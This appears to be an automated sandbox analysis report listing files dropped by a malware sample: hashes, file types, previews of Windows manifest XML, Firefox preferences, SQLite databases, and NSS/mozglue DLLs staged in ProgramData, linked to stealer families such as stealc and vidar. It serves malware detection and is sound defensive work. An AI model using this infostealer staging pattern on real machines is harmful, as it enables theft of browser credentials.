SHA-256:	D4EE07BC2183E3D013B68B080B9E2F603676B27F8B0C95CCA2ED533BC671FAFA
SHA-512:	095C2B1C129C36125FE17ED096FDE58AE0F8AF61527D9AEDCAB379C3221BF09D87F28846E6FA3CF9FE05C750689A2ADFCDD1AB67409780A12A425A33219858EC
Malicious:	false
Preview:	.<?xml version='1.0' encoding='utf-8' standalone='yes'?>..<assembly>.. <assemblyIdentity.. buildType="release".. language="neutral".. name="Microsoft-Windows-Authentication-AuthUI-Component".. processorArchitecture="*".. publicKeyToken="".. version="0.0.0.0".. versionScope="nonSxS".. />.. <migration.. optimizePatterns="no".. offlineApply="no".. replacementSettingsVersionRange="0".. replacementVersionRange="6.2-10.0".. scope="MigWiz,Upgrade".. settingsVersion="0".. >.. <migXml xmlns="">.. <rules context="System">.. <include>.. <objectSet>.. Downlevel settings -->.. <pattern type="Registry">HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon [DefaultUserName]</pattern>.. <pattern type="Registry">HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon [DefaultDomainName]</pattern>.. <pattern type="Registry">HKLM\Software\Microsof

C:\ProgramData\EBGCFBGCBFHJ\EBFBKF

Download File

Process:	C:\Users\user\AppData\Local\Temp\419591\Predicted.pif
File Type:	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	889
Entropy (8bit):	5.016955029110262
Encrypted:	false
SSDEEP:	24:p/o2e8ZR+Vj3Xg0cjAkt3QbENgwnwJXMFhUK:22e8v+VrgfAbIggwJuX
MD5:	2948FF1C0804EC7DB473BB77EB3FBE4E
SHA1:	98A97AFC0E4E2B09A17AA0746F455DFD24356357
SHA-256:	2F6B99F5915A462CAFF60950839E1498F12C9F8194DB3DA02251C5BD2CAD700E
SHA-512:	8393B3AE7D44A4DD85D05D48768F9123910E603C477A3CACC6BF12D03D464959EC01A293B0B3317B0F8470A76D71F695098AE211DD6200D8F7F21E1C757F4EDA
Malicious:	false
Preview:	.<?xml version='1.0' encoding='utf-8' standalone='yes'?>..<assembly.. xmlns="urn:schemas-microsoft-com:asm.v3".. xmlns:xsd="http://www.w3.org/2001/XMLSchema".. xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance".. manifestVersion="1.0".. >.. <assemblyIdentity.. language="neutral".. name="Microsoft-Windows-Security-NGC-PopKeySrv".. processorArchitecture="".. version="0.0.0.0".. />.. <migration.. offlineApply="no".. scope="Upgrade,Data".. settingsVersion="3".. replacementSettingsVersionRange="0-2" .. >.. <migXml xmlns="">.. <rules context="System">.. <include>.. <objectSet>.. <pattern type="Registry">HKLM\SYSTEM\CurrentControlSet\Control\Cryptography\Ngc\ [*]</pattern>.. </objectSet>.. </include>.. </rules>.. </migXml>.. </migration>..</assembly>..

C:\ProgramData\EBGCFBGCBFHJ\EHCBAA

Download File

Process:	C:\Users\user\AppData\Local\Temp\419591\Predicted.pif
File Type:	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	1095
Entropy (8bit):	4.976174799333973
Encrypted:	false
SSDEEP:	24:p/o2e8ZR+UX6g0cj3+3A63sDEF4wwVpQwuoMBX0FCUK:22e8v+DgfLUwY4fcZB2A
MD5:	ECC51190BD585AB376691BBDDF2A638B
SHA1:	84DE01CF25B71C0BC4D16FAF65BE1589E385EAF0
SHA-256:	6F15C7E90A3C414BEAD4C1C50DC5E7CAB987D72E2F49953B717A879D7745038C
SHA-512:	C0626F92BD934A3C5295EA32D63910C3F51E0A47CB6287C698C0DF7EE66C1D1A1867FDE10F824BD7514566C69CD2DA16571D3F0DC56FE9DE39D13F89DFE2A02A
Malicious:	false
Preview:	.<?xml version='1.0' encoding='utf-8' standalone='yes'?>..<assembly.. xmlns="urn:schemas-microsoft-com:asm.v3".. xmlns:xsd="http://www.w3.org/2001/XMLSchema".. xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance".. manifestVersion="1.0".. >.. <assemblyIdentity.. language="neutral".. name="Microsoft-Windows-Embedded-KeyboardFilterService-Client".. processorArchitecture="".. version="0.0.0.0".. versionScope="nonSxS".. />.. <migration.. replacementSettingsVersionRange="0-1".. settingsVersion="2".. >.. <machineSpecific>.. <migXml xmlns="">.. Per-machine state -->.. <rules context="System">.. <include>.. <objectSet>.. <pattern type="Registry">HKLM\SOFTWARE\Microsoft\Windows Embedded\KeyboardFilter\ [*]</pattern>.. <pattern type="Registry">HKLM\SYSTEM\CurrentControlSet\Services\MsKeyboardFilter [Start]</pattern>.. </objectSet>.. </inc

C:\ProgramData\EBGCFBGCBFHJ\EHJDGC

Download File

Process:	C:\Users\user\AppData\Local\Temp\419591\Predicted.pif
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
Category:	dropped
Size (bytes):	159744
Entropy (8bit):	0.7873599747470391
Encrypted:	false
SSDEEP:	96:pn6pld6px0c2EDKFm5wTmN8ewmdaDKFmJ4ee7vuejzH+bF+UIYysX0IxQzh/tsVL:8Ys3QMmRtH+bF+UI3iN0RSV0k3qLyj9v
MD5:	6A6BAD38068B0F6F2CADC6464C4FE8F0
SHA1:	4E3B235898D8E900548613DDB6EA59CDA5EB4E68
SHA-256:	0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
SHA-512:	BFE41E5AB5851C92308A097FE9DA4F215875AC2C7D7A483B066585071EE6086B5A7BE6D80CEC18027A3B88AA5C0A477730B22A41406A6AB344FCD9C659B9CB0A
Malicious:	false
Preview:	SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\EBGCFBGCBFHJ\GCAKKE

Download File

Process:	C:\Users\user\AppData\Local\Temp\419591\Predicted.pif
File Type:	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	8193
Entropy (8bit):	5.027484893998515
Encrypted:	false
SSDEEP:	96:WNPERXr2q6QOOzJMk67cY8GrPVYRjDjXK2FJpjjsjwjZjj6OzJMk67cY8GrPVYRM:a2gwP625sQ9jsw902I
MD5:	2D6ACF2AEC5E5349B16581C8AE23BF3E
SHA1:	0AA7B29E8F13EB16F3DFC503D4E8CC55424ECB15
SHA-256:	B48F54A1F8A4C3A25D7E0FBCB95BF2C825C89ACD9C80EBACE8C15681912EDEA2
SHA-512:	7943AA852F34778B9197C34E6B6978FE51E0CDD2130167CB9C7C56D1B2B1272051EFE03DF3A21A12ECB9B9303DE0733E335CDE0BBBE1A1FC429E3323D335A1FE
Malicious:	false
Preview:	.<?xml version='1.0' encoding='utf-8' standalone='yes'?>..<assembly>.. AuthUI has 3 different component names that matter in its migration story... The one that applies during the migration gather phase is as follows:.. Microsoft-Windows-Authentication-AuthUI: Vista and Win7.. Microsoft-Windows-Authentication-AuthUI-Component: Win8 (and beyond).. In order to support migration from Vista/Win7 to Win8, we update the Microsoft-Windows-Authentication-AuthUI component.. to gather in the MigWiz scope (in addition to the Upgrade scope, which it already supported)... -->.. <assemblyIdentity.. buildType="$(build.buildType)".. language="neutral".. name="Microsoft-Windows-Authentication-AuthUI".. processorArchitecture="*".. publicKeyToken="".. version="0.0.0.0".. versionScope="nonSxS".. />.. <migration .. optimizePatterns="no".. offlineApply="no".. alwaysProcess="yes".. scope="MigWiz,

C:\ProgramData\EBGCFBGCBFHJ\GHJDHD

Download File

Process:	C:\Users\user\AppData\Local\Temp\419591\Predicted.pif
File Type:	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	2062
Entropy (8bit):	4.925445222257812
Encrypted:	false
SSDEEP:	48:227+9gUKl+lxFcCY4/YBu4yTy3opyLyXyoyOyzylpjyA:22Sw+lxaWm3uCL9Gv
MD5:	60145F68B1CF9440FA663820AE11CE4B
SHA1:	10195A2926015E3024D769673E004AA60DFEC0A3
SHA-256:	4805E01EB0C9B3DFEB6B754D4148588E2FB798734D9EDE20E53EB8E75158B64F
SHA-512:	55D088040D25D4CBFF5A4210A85107666E628C67CA3134B0C836E135DBFE82AA4FA70185993E99D951307F7D159C1428B390727DA17EFEC5AA4BE9D799B96895
Malicious:	false
Preview:	.<?xml version='1.0' encoding='utf-8' standalone='yes'?>..<assembly.. xmlns="urn:schemas-microsoft-com:asm.v3".. manifestVersion="1.0".. >.. <assemblyIdentity.. language="".. name="Microsoft-Windows-Kerberos-Key-Distribution-Center-DL".. processorArchitecture="".. publicKeyToken="$(Build.WindowsPublicKeyToken)".. version="0.0.0.0".. />.. <migration>.. <machineSpecific>.. <migXml xmlns="">.. Check as this is only valid for down-level OS < than Windows Vista ? -->.. <detects>.. <detect>.. <condition>MigXmlHelper.IsOSEarlierThan("NT", "6.0.0.0")</condition>.. </detect>.. </detects>.. <rules context="System">.. <include>.. <objectSet>.. <pattern type="Registry">HKLM\SYSTEM\CurrentControlSet\Services\kdc\* [*]</pattern>.. </objectSet>.. </include>.. <exclude>.. <objectSet>.. <pattern type="Reg

C:\ProgramData\EBGCFBGCBFHJ\GIJDGC

Download File

Process:	C:\Users\user\AppData\Local\Temp\419591\Predicted.pif
File Type:	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	1065
Entropy (8bit):	4.96984082363901
Encrypted:	false
SSDEEP:	24:p/o2e8ZF2YS+pg0cjh3N1LRMEF4wuSb3wuyBX0FCUK:22e8z2j+pgfZlMY4Qr0B2A
MD5:	4DBFCA3B87A59186D2612A95CA2CD899
SHA1:	4C84BD2D60CE789B44070CDDC296C09D2F52B1CC
SHA-256:	2C229D8DA31E17FCEF244A8A2029CA8FE8374738A9ECBFED9E23FB89DB8DF059
SHA-512:	704ECDBE3FC38AC3807946072C7C523C36B4AF1586BEFE01A87BBBF35CF20214A0E0DE892A56E74FE8AA806154D7D2B9CC7028AEF47BEC326564B5F18CD12421
Malicious:	false
Preview:	.<?xml version='1.0' encoding='utf-8' standalone='yes'?>..<assembly.. xmlns="urn:schemas-microsoft-com:asm.v3".. xmlns:xsd="http://www.w3.org/2001/XMLSchema".. xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance".. manifestVersion="1.0".. >.. <assemblyIdentity.. buildType="$(build.buildType)".. language="neutral".. name="Microsoft-OneCore-TetheringService".. processorArchitecture="".. version="0.0.0.0".. />.. <migration.. replacementSettingsVersionRange="0".. settingsVersion="1".. alwaysProcess="Yes".. >.. <machineSpecific>.. <migXml xmlns="">.. <rules context="System">.. <include>.. <objectSet>.. <pattern type="Registry">HKLM\SYSTEM\CurrentControlSet\Services\icssvc\Roaming\[]</pattern>.. <pattern type="Registry">HKLM\SYSTEM\CurrentControlSet\Services\icssvc\Settings\[*]</pattern>.. </objectSet>.. </include>.. </rules>..

C:\ProgramData\EBGCFBGCBFHJ\HDAAAA

Download File

Process:	C:\Users\user\AppData\Local\Temp\419591\Predicted.pif
File Type:	ASCII text, with very long lines (1809), with CRLF line terminators
Category:	dropped
Size (bytes):	9571
Entropy (8bit):	5.536643647658967
Encrypted:	false
SSDEEP:	192:qnaRt+YbBp6ihj4qyaaX86KKkfGNBw8DJSl:yegqumcwQ0
MD5:	5D8E5D85E880FB2D153275FCBE9DA6E5
SHA1:	72332A8A92B77A8B1E3AA00893D73FC2704B0D13
SHA-256:	50490DC0D0A953FA7D5E06105FE9676CDB9B49C399688068541B19DD911B90F9
SHA-512:	57441B4CCBA58F557E08AAA0918D1F9AC36D0AF6F6EB3D3C561DA7953ED156E89857FFB829305F65D220AE1075BC825F131D732B589B5844C82CA90B53AAF4EE
Malicious:	false
Preview:	// Mozilla User Preferences....// DO NOT EDIT THIS FILE...//..// If you make changes to this file while the application is running,..// the changes will be overwritten when the application exits...//..// To change a preference value, you can either:..// - modify it via the UI (e.g. via about:config in the browser); or..// - set it within a user.js file in your profile.....user_pref("app.normandy.first_run", false);..user_pref("app.normandy.migrationsApplied", 12);..user_pref("app.normandy.user_id", "57f16a19-e119-4073-bf01-28f88011f783");..user_pref("app.update.auto.migrated", true);..user_pref("app.update.background.rolledout", true);..user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 0);..user_pref("app.update.lastUpdateTime.recipe-client-addon-run", 1696333830);..user_pref("app.update.lastUpdateTime.region-update-timer", 0);..user_pref("app.update.lastUpdateTime.rs-experiment-loader-timer", 1696333856);..user_pref("app.update.lastUpdateTime.xpi-signature-verification

C:\ProgramData\EBGCFBGCBFHJ\HJJJEC

Download File

Process:	C:\Users\user\AppData\Local\Temp\419591\Predicted.pif
File Type:	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	2947
Entropy (8bit):	5.120077314818075
Encrypted:	false
SSDEEP:	48:22e8T8PvMu0846PYPvJ8+F9gUUL0VlxfMUIgPdunPduZJ0gPdunPduZQ/+lx3cCQ:22X8PvMu0LtPvJPF+0VlVO0z60w+lfah
MD5:	C7E301D9DD77A21C1CDBD73A63AF205C
SHA1:	715D25AA0C06B2AD162F52A8DE06FB5040C389B1
SHA-256:	239C9A49ACDA9FC9845B87819A33D07F359803153FEFFE4D2212989F82DE71E1
SHA-512:	B0E6FFB10EF5EB9EB433A23803591C84F603779306E78B1648374218A50D2F77E8EE7215615E9D1BE033A96B735321FCA9D5F7B0CB65661674346FC1546E43FE
Malicious:	false
Preview:	.<?xml version='1.0' encoding='utf-8' standalone='yes'?>..<assembly.. xmlns="urn:schemas-microsoft-com:asm.v3".. xmlns:xsd="http://www.w3.org/2001/XMLSchema".. xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance".. authors="jeffspel".. buildFilter="".. company="Microsoft".. copyright="".. creationTimeStamp="2005-09-13T14:04:43.4054402-07:00".. lastUpdateTimeStamp="2005-09-13T15:39:02.9208750-08:00".. manifestVersion="1.0".. owners="jeffspel".. supportInformation="".. testers="".. >.. <assemblyIdentity.. buildFilter="".. buildType="release".. language="neutral".. name="Microsoft-Windows-Crypto-keys-DL".. processorArchitecture="*".. publicKeyToken="$(Build.WindowsPublicKeyToken)".. type="".. version="0.0.0.0".. versionScope="nonSxS".. />.. <migration.. xmlns="".. scope="Upgrade,MigWiz,USMT".. >.. <migXml xmlns="">.. Check as this is only valid for down-level OS < t

C:\ProgramData\EBGCFBGCBFHJ\JKJDBA

Download File

Process:	C:\Users\user\AppData\Local\Temp\419591\Predicted.pif
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	24008
Entropy (8bit):	6.062446965815151
Encrypted:	false
SSDEEP:	192:GKODczWz9IdqYbN9h+rKipXKuS28xb3HWJvah46Flkzl2W4FWEWSawTyihVWQ4e1:6DiWzGG+mKlxb32JyczEW4FWdwGyUlI
MD5:	6AEAEBF650EFC93CD3B6670A05724FE8
SHA1:	A4FE07E6C678AC8D4DC095997DB5043668D103B4
SHA-256:	C86891B9DF9FEEA2E98F50C9950CB446DB97A513AF0C23810F7CA818A6187329
SHA-512:	5C7E8C7DBAEB22956C774199BAD83312987240D574160B846349C0E237445407FF1CAACD2984BFAD0BBBE6011CC8918AF60A0EBBE82A8561CAFA4DF825ADD183
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: lem.exe, Detection: malicious, Browse Filename: ljwIPDSwFi.exe, Detection: malicious, Browse Filename: jE4zclRJU2.exe, Detection: malicious, Browse Filename: 5CG2133F5Y_2024-04-05_12_15_35.569.zip, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........Q..Q..Q..E...S..E...]..Q..t..E...Z..E...P..E...S..E.S.P..E...P..RichQ..................PE..d....Q.!..........",.........$......................................................Bn....`A.........................................<..X....<..x....p..(....`..h....<...!......(....8..T............................0..............(1..0............................text...p........................... ..`.rdata..>....0......................@..@.data...`....P.......0..............@....pdata..h....`.......2..............@..@.rsrc...(....p.......4..............@..@.reloc..(............:..............@..B........................................................................................................................................................................................................................................................................

C:\ProgramData\EBGCFBGCBFHJ\KEGCFC

Download File

Process:	C:\Users\user\AppData\Local\Temp\419591\Predicted.pif
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
Category:	dropped
Size (bytes):	28672
Entropy (8bit):	2.5793180405395284
Encrypted:	false
SSDEEP:	96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
MD5:	41EA9A4112F057AE6BA17E2838AEAC26
SHA1:	F2B389103BFD1A1A050C4857A995B09FEAFE8903
SHA-256:	CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
SHA-512:	29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\EBGCFBGCBFHJ\KKEHIE

Download File

Process:	C:\Users\user\AppData\Local\Temp\419591\Predicted.pif
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	49152
Entropy (8bit):	0.8180424350137764
Encrypted:	false
SSDEEP:	96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
MD5:	349E6EB110E34A08924D92F6B334801D
SHA1:	BDFB289DAFF51890CC71697B6322AA4B35EC9169
SHA-256:	C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
SHA-512:	2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\EBGCFBGCBFHJ\KKJKFB

Download File

Process:	C:\Users\user\AppData\Local\Temp\419591\Predicted.pif
File Type:	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	1941
Entropy (8bit):	4.861537145678193
Encrypted:	false
SSDEEP:	48:22e8v+phDgrcHreIg/0xJ9U3C0gcj0kqIg/0xJuX:22CphPHyx0ruS0N0kqx0rQ
MD5:	6F0056EC818D4FC20158F3FF190D6D6A
SHA1:	9E2108FE560CC2187395C5EED011559D201CE45D
SHA-256:	2F9596801DBE57D73C292BE4F93BD0C05F6D0A44C7A45F5F03FDBE35993B7DEC
SHA-512:	72C193919EC4402D430CCBCC4F9A9B25DC9AAECBCCAEE666EFE20DA4133964D2382F1090EEB8FB0A3073ACAA7825AF7A62B59447D29F912A19BD4C04CDDF1AD1
Malicious:	false
Preview:	.<?xml version='1.0' encoding='utf-8' standalone='yes'?>..<assembly.. xmlns="urn:schemas-microsoft-com:asm.v3".. xmlns:xsd="http://www.w3.org/2001/XMLSchema".. xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance".. manifestVersion="1.0".. >.. <assemblyIdentity.. language="neutral".. name="Microsoft-CertificateAuthority-Enrollment-ServerUpgrade".. processorArchitecture="".. version="1.0.0.0".. versionScope="nonSxS".. />.. <migration.. alwaysProcess="yes".. replacementSettingsVersionRange="0".. replacementVersionRange="6.1.".. settingsVersion="0".. >.. <migXml xmlns="">.. <rules context="System">.. <include>.. <objectSet>.. <pattern type="Registry">HKLM\Software\Microsoft\ADCS\CES [ConfigurationStatus]</pattern>.. </objectSet>.. </include>.. </rules>.. <rules context="System">.. <detects>.. <detect>.. Detection of CES. -

C:\ProgramData\freebl3.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\419591\Predicted.pif
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	685392
Entropy (8bit):	6.872871740790978
Encrypted:	false
SSDEEP:	12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
MD5:	550686C0EE48C386DFCB40199BD076AC
SHA1:	EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
SHA-256:	EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
SHA-512:	0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: a96b3ddd991bc4a88831685ef44cbd4ad7945a4afc3a028f42812f269d513674_payload.exe, Detection: malicious, Browse Filename: SecuriteInfo.com.Win32.BootkitX-gen.24236.15066.exe, Detection: malicious, Browse Filename: 66bddfc358668_stealc.exe, Detection: malicious, Browse Filename: 66bddfcb52736_vidar.exe, Detection: malicious, Browse Filename: Hf4FkSWycv.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\mozglue.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\419591\Predicted.pif
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	608080
Entropy (8bit):	6.833616094889818
Encrypted:	false
SSDEEP:	12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
MD5:	C8FD9BE83BC728CC04BEFFAFC2907FE9
SHA1:	95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
SHA-256:	BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
SHA-512:	FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\msvcp140.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\419591\Predicted.pif
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	450024
Entropy (8bit):	6.673992339875127
Encrypted:	false
SSDEEP:	12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
MD5:	5FF1FCA37C466D6723EC67BE93B51442
SHA1:	34CC4E158092083B13D67D6D2BC9E57B798A303B
SHA-256:	5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
SHA-512:	4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................

C:\ProgramData\nss3.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\419591\Predicted.pif
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2046288
Entropy (8bit):	6.787733948558952
Encrypted:	false
SSDEEP:	49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
MD5:	1CC453CDF74F31E4D913FF9C10ACDDE2
SHA1:	6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
SHA-256:	AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
SHA-512:	DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................\|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\softokn3.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\419591\Predicted.pif
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	257872
Entropy (8bit):	6.727482641240852
Encrypted:	false
SSDEEP:	6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
MD5:	4E52D739C324DB8225BD9AB2695F262F
SHA1:	71C3DA43DC5A0D2A1941E874A6D015A071783889
SHA-256:	74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
SHA-512:	2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................\|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\vcruntime140.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\419591\Predicted.pif
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	80880
Entropy (8bit):	6.920480786566406
Encrypted:	false
SSDEEP:	1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
MD5:	A37EE36B536409056A86F50E67777DD7
SHA1:	1CAFA159292AA736FC595FC04E16325B27CD6750
SHA-256:	8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
SHA-512:	3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...\|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\seo[1].exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Category:	dropped
Size (bytes):	972074
Entropy (8bit):	7.935725999195619
Encrypted:	false
SSDEEP:	24576:DzZkHUqsNgLbcSxM2RczPgnAK+vYOLtfIPOstlO5q:DSHU3ecSjoPWX+TLIOstlh
MD5:	6F858C09E6D3B2DBD42ADC2FB19B217B
SHA1:	420A21137BC1B746877DDFFB7BFEEF2595F88497
SHA-256:	F6B2CD5327818418DB45F70ED99BC6751D836EAF503A9BF33602AF0C74F61E83
SHA-512:	F4AEC1F85B62D3703CA81F2E322AA35669EF701ABC3D34AFD4211ADCFD731F263BFE37015AB64C05BBBD5364D4C133AC8F6E9ECAFA8605E0C8060CBBDF021B10
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
